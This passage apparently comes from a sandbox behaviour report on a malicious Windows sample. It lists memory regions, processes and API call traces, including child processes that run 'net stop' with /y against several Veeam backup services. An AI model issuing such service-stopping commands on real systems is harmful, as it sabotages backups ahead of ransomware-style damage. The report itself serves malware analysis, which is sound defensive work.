"c:\\windows\\system32\\netutils.dll") Region: id = 12070 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 12071 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 12072 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 12073 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 12074 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 12075 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Thread: id = 865 os_tid = 0x7f0 Process: id = "340" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x6522e000" os_pid = "0xa8c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "333" os_parent_pid = "0xc0c" cmd_line = "C:\\Windows\\system32\\net1 stop VeeamBrokerSvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11983 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 11984 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 11985 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 11986 start_va = 0x50000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 11987 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11988 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 11989 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 11990 start_va = 0xffeb0000 end_va = 0xffee2fff entry_point = 0xffeb0000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 11991 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 11992 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 11993 start_va = 0x7fffffd6000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 11994 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 11995 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 11996 start_va = 0xd0000 end_va = 0x136fff entry_point = 0xd0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 11997 start_va = 0x150000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 11998 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 11999 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 12000 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 12001 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 12002 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 12003 start_va = 0x270000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 12004 start_va = 0x280000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 12005 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 12006 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 12007 start_va = 0x7fefb6e0000 end_va = 0x7fefb6f1fff entry_point = 0x7fefb6e0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 12008 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 12009 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 12010 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 12011 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 12012 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 12013 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 12014 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 12015 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 12016 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 12017 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 12018 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 12019 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 12020 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 12021 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 867 os_tid = 0x8f0 [0118.079] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xcfa30 | out: lpSystemTimeAsFileTime=0xcfa30*(dwLowDateTime=0xfb866730, dwHighDateTime=0x1d48689)) [0118.079] GetCurrentProcessId () returned 0xa8c [0118.079] GetCurrentThreadId () returned 0x8f0 [0118.079] GetTickCount () returned 0x272fd [0118.079] QueryPerformanceCounter (in: lpPerformanceCount=0xcfa38 | out: lpPerformanceCount=0xcfa38*=1816499800000) returned 1 [0118.081] GetModuleHandleW (lpModuleName=0x0) returned 0xffeb0000 [0118.081] __set_app_type (_Type=0x1) [0118.081] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffec9c9c) returned 0x0 [0118.081] __getmainargs (in: _Argc=0xffed4780, _Argv=0xffed4790, _Env=0xffed4788, _DoWildCard=0, _StartInfo=0xffed479c | out: _Argc=0xffed4780, _Argv=0xffed4790, _Env=0xffed4788) returned 0 [0118.081] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0118.081] GetConsoleOutputCP () returned 0x1b5 [0118.121] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xffedcec0 | out: lpCPInfo=0xffedcec0) returned 1 [0118.121] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0118.123] sprintf_s (in: _DstBuf=0xcf9d8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0118.123] setlocale (category=0, locale=".437") returned="English_United States.437" [0118.125] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0118.125] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0118.125] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop VeeamBrokerSvc /y" [0118.125] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xcf770, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0118.125] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0118.125] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0xcf9c8 | out: Buffer=0xcf9c8*=0x164d50) returned 0x0 [0118.125] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0xcf9c8 | out: Buffer=0xcf9c8*=0x16c100) returned 0x0 [0118.125] _fileno (_File=0x7fefdba2a80) returned 0 [0118.125] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0118.125] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0118.125] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0118.125] _wcsicmp (_String1="config", _String2="stop") returned -16 [0118.126] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0118.126] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0118.126] _wcsicmp (_String1="file", _String2="stop") returned -13 [0118.126] _wcsicmp (_String1="files", _String2="stop") returned -13 [0118.126] _wcsicmp (_String1="group", _String2="stop") returned -12 [0118.126] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0118.126] _wcsicmp (_String1="help", _String2="stop") returned -11 [0118.126] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0118.126] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0118.126] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0118.126] _wcsicmp (_String1="session", _String2="stop") returned -15 [0118.126] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0118.126] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0118.126] _wcsicmp (_String1="share", _String2="stop") returned -12 [0118.126] _wcsicmp (_String1="start", _String2="stop") returned -14 [0118.126] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0118.126] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0118.126] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0118.126] _wcsicmp (_String1="accounts", _String2="VeeamBrokerSvc") returned -21 [0118.126] _wcsicmp (_String1="computer", _String2="VeeamBrokerSvc") returned -19 [0118.126] _wcsicmp (_String1="config", _String2="VeeamBrokerSvc") returned -19 [0118.126] _wcsicmp (_String1="continue", _String2="VeeamBrokerSvc") returned -19 [0118.126] _wcsicmp (_String1="cont", _String2="VeeamBrokerSvc") returned -19 [0118.126] _wcsicmp (_String1="file", _String2="VeeamBrokerSvc") returned -16 [0118.126] _wcsicmp (_String1="files", _String2="VeeamBrokerSvc") returned -16 [0118.126] _wcsicmp (_String1="group", _String2="VeeamBrokerSvc") returned -15 [0118.126] _wcsicmp (_String1="groups", _String2="VeeamBrokerSvc") returned -15 [0118.126] _wcsicmp (_String1="help", _String2="VeeamBrokerSvc") returned -14 [0118.126] _wcsicmp (_String1="helpmsg", _String2="VeeamBrokerSvc") returned -14 [0118.126] _wcsicmp (_String1="localgroup", _String2="VeeamBrokerSvc") returned -10 [0118.126] _wcsicmp (_String1="pause", _String2="VeeamBrokerSvc") returned -6 [0118.126] _wcsicmp (_String1="session", _String2="VeeamBrokerSvc") returned -3 [0118.127] _wcsicmp (_String1="sessions", _String2="VeeamBrokerSvc") returned -3 [0118.127] _wcsicmp (_String1="sess", _String2="VeeamBrokerSvc") returned -3 [0118.127] _wcsicmp (_String1="share", _String2="VeeamBrokerSvc") returned -3 [0118.127] _wcsicmp (_String1="start", _String2="VeeamBrokerSvc") returned -3 [0118.127] _wcsicmp (_String1="stats", _String2="VeeamBrokerSvc") returned -3 [0118.127] _wcsicmp (_String1="statistics", _String2="VeeamBrokerSvc") returned -3 [0118.127] _wcsicmp (_String1="stop", _String2="VeeamBrokerSvc") returned -3 [0118.127] _wcsicmp (_String1="time", _String2="VeeamBrokerSvc") returned -2 [0118.127] _wcsicmp (_String1="user", _String2="VeeamBrokerSvc") returned -1 [0118.127] _wcsicmp (_String1="users", _String2="VeeamBrokerSvc") returned -1 [0118.127] _wcsicmp (_String1="msg", _String2="VeeamBrokerSvc") returned -9 [0118.127] _wcsicmp (_String1="messenger", _String2="VeeamBrokerSvc") returned -9 [0118.127] _wcsicmp (_String1="receiver", _String2="VeeamBrokerSvc") returned -4 [0118.127] _wcsicmp (_String1="rcv", _String2="VeeamBrokerSvc") returned -4 [0118.127] _wcsicmp (_String1="netpopup", _String2="VeeamBrokerSvc") returned -8 [0118.127] _wcsicmp (_String1="redirector", _String2="VeeamBrokerSvc") returned -4 [0118.127] _wcsicmp (_String1="redir", _String2="VeeamBrokerSvc") returned -4 [0118.127] _wcsicmp (_String1="rdr", _String2="VeeamBrokerSvc") returned -4 [0118.127] _wcsicmp (_String1="workstation", _String2="VeeamBrokerSvc") returned 1 [0118.127] _wcsicmp (_String1="work", _String2="VeeamBrokerSvc") returned 1 [0118.127] _wcsicmp (_String1="wksta", _String2="VeeamBrokerSvc") returned 1 [0118.127] _wcsicmp (_String1="prdr", _String2="VeeamBrokerSvc") returned -6 [0118.127] _wcsicmp (_String1="devrdr", _String2="VeeamBrokerSvc") returned -18 [0118.127] _wcsicmp (_String1="lanmanworkstation", _String2="VeeamBrokerSvc") returned -10 [0118.127] _wcsicmp (_String1="server", _String2="VeeamBrokerSvc") returned -3 [0118.127] _wcsicmp (_String1="svr", _String2="VeeamBrokerSvc") returned -3 [0118.127] _wcsicmp (_String1="srv", _String2="VeeamBrokerSvc") returned -3 [0118.127] _wcsicmp (_String1="lanmanserver", _String2="VeeamBrokerSvc") returned -10 [0118.127] _wcsicmp (_String1="alerter", _String2="VeeamBrokerSvc") returned -21 [0118.127] _wcsicmp (_String1="netlogon", _String2="VeeamBrokerSvc") returned -8 [0118.127] _wcsupr (in: _String="VeeamBrokerSvc" | out: _String="VEEAMBROKERSVC") returned="VEEAMBROKERSVC" [0118.128] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x16ce10 [0118.131] GetServiceKeyNameW (in: hSCManager=0x16ce10, lpDisplayName="VEEAMBROKERSVC", lpServiceName=0xffed5750, lpcchBuffer=0xcf8e8 | out: lpServiceName="", lpcchBuffer=0xcf8e8) returned 0 [0118.132] _wcsicmp (_String1="msg", _String2="VEEAMBROKERSVC") returned -9 [0118.132] _wcsicmp (_String1="messenger", _String2="VEEAMBROKERSVC") returned -9 [0118.132] _wcsicmp (_String1="receiver", _String2="VEEAMBROKERSVC") returned -4 [0118.132] _wcsicmp (_String1="rcv", _String2="VEEAMBROKERSVC") returned -4 [0118.132] _wcsicmp (_String1="redirector", _String2="VEEAMBROKERSVC") returned -4 [0118.132] _wcsicmp (_String1="redir", _String2="VEEAMBROKERSVC") returned -4 [0118.132] _wcsicmp (_String1="rdr", _String2="VEEAMBROKERSVC") returned -4 [0118.132] _wcsicmp (_String1="workstation", _String2="VEEAMBROKERSVC") returned 1 [0118.132] _wcsicmp (_String1="work", _String2="VEEAMBROKERSVC") returned 1 [0118.132] _wcsicmp (_String1="wksta", _String2="VEEAMBROKERSVC") returned 1 [0118.132] _wcsicmp (_String1="prdr", _String2="VEEAMBROKERSVC") returned -6 [0118.132] _wcsicmp (_String1="devrdr", _String2="VEEAMBROKERSVC") returned -18 [0118.132] _wcsicmp (_String1="lanmanworkstation", _String2="VEEAMBROKERSVC") returned -10 [0118.132] _wcsicmp (_String1="server", _String2="VEEAMBROKERSVC") returned -3 [0118.132] _wcsicmp (_String1="svr", _String2="VEEAMBROKERSVC") returned -3 [0118.132] _wcsicmp (_String1="srv", _String2="VEEAMBROKERSVC") returned -3 [0118.133] _wcsicmp (_String1="lanmanserver", _String2="VEEAMBROKERSVC") returned -10 [0118.133] _wcsicmp (_String1="alerter", _String2="VEEAMBROKERSVC") returned -21 [0118.133] _wcsicmp (_String1="netlogon", _String2="VEEAMBROKERSVC") returned -8 [0118.133] NetServiceControl (in: servername=0x0, service="VEEAMBROKERSVC", opcode=0x0, arg=0x0, bufptr=0xcf8f0 | out: bufptr=0xcf8f0) returned 0x889 [0118.134] wcscpy_s (in: _Destination=0xffed80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0118.134] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0118.135] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xffed5b50, nSize=0x800, Arguments=0xffed7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0118.137] GetFileType (hFile=0xb) returned 0x2 [0118.137] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xcf7b8 | out: lpMode=0xcf7b8) returned 1 [0118.137] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffed5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xcf7b0, lpReserved=0x0 | out: lpBuffer=0xffed5b50*, lpNumberOfCharsWritten=0xcf7b0*=0x1e) returned 1 [0118.137] GetFileType (hFile=0xb) returned 0x2 [0118.138] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xcf7b8 | out: lpMode=0xcf7b8) returned 1 [0118.138] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffeb1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xcf7b0, lpReserved=0x0 | out: lpBuffer=0xffeb1efc*, lpNumberOfCharsWritten=0xcf7b0*=0x2) returned 1 [0118.139] _ultow (in: _Dest=0x889, _Radix=849952 | out: _Dest=0x889) returned="2185" [0118.139] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xffed5b50, nSize=0x800, Arguments=0xffed7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0118.139] GetFileType (hFile=0xb) returned 0x2 [0118.139] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xcf7b8 | out: lpMode=0xcf7b8) returned 1 [0118.139] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffed5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0xcf7b0, lpReserved=0x0 | out: lpBuffer=0xffed5b50*, lpNumberOfCharsWritten=0xcf7b0*=0x34) returned 1 [0118.140] GetFileType (hFile=0xb) returned 0x2 [0118.140] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xcf7b8 | out: lpMode=0xcf7b8) returned 1 [0118.140] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffeb1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xcf7b0, lpReserved=0x0 | out: lpBuffer=0xffeb1efc*, lpNumberOfCharsWritten=0xcf7b0*=0x2) returned 1 [0118.141] NetApiBufferFree (Buffer=0x164d50) returned 0x0 [0118.141] NetApiBufferFree (Buffer=0x16c100) returned 0x0 [0118.141] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop VeeamBrokerSvc /y" [0118.141] exit (_Code=2) Process: id = "341" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x50fed000" os_pid = "0x938" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop VeeamDeploySvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12022 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 12023 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 12024 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 12025 start_va = 0x170000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 12026 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12027 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 12028 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 12029 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 12030 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 12031 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 12032 start_va = 0x7fffffd5000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 12033 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 12034 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 12035 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12036 start_va = 0x2c0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 12037 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 12038 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 12039 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 12040 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 868 os_tid = 0x123c Process: id = "342" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x5093a000" os_pid = "0xc14" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop VeeamEnterpriseManagerSvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12041 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 12042 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 12043 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 12044 start_va = 0x210000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 12045 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12046 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 12047 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 12048 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 12049 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = 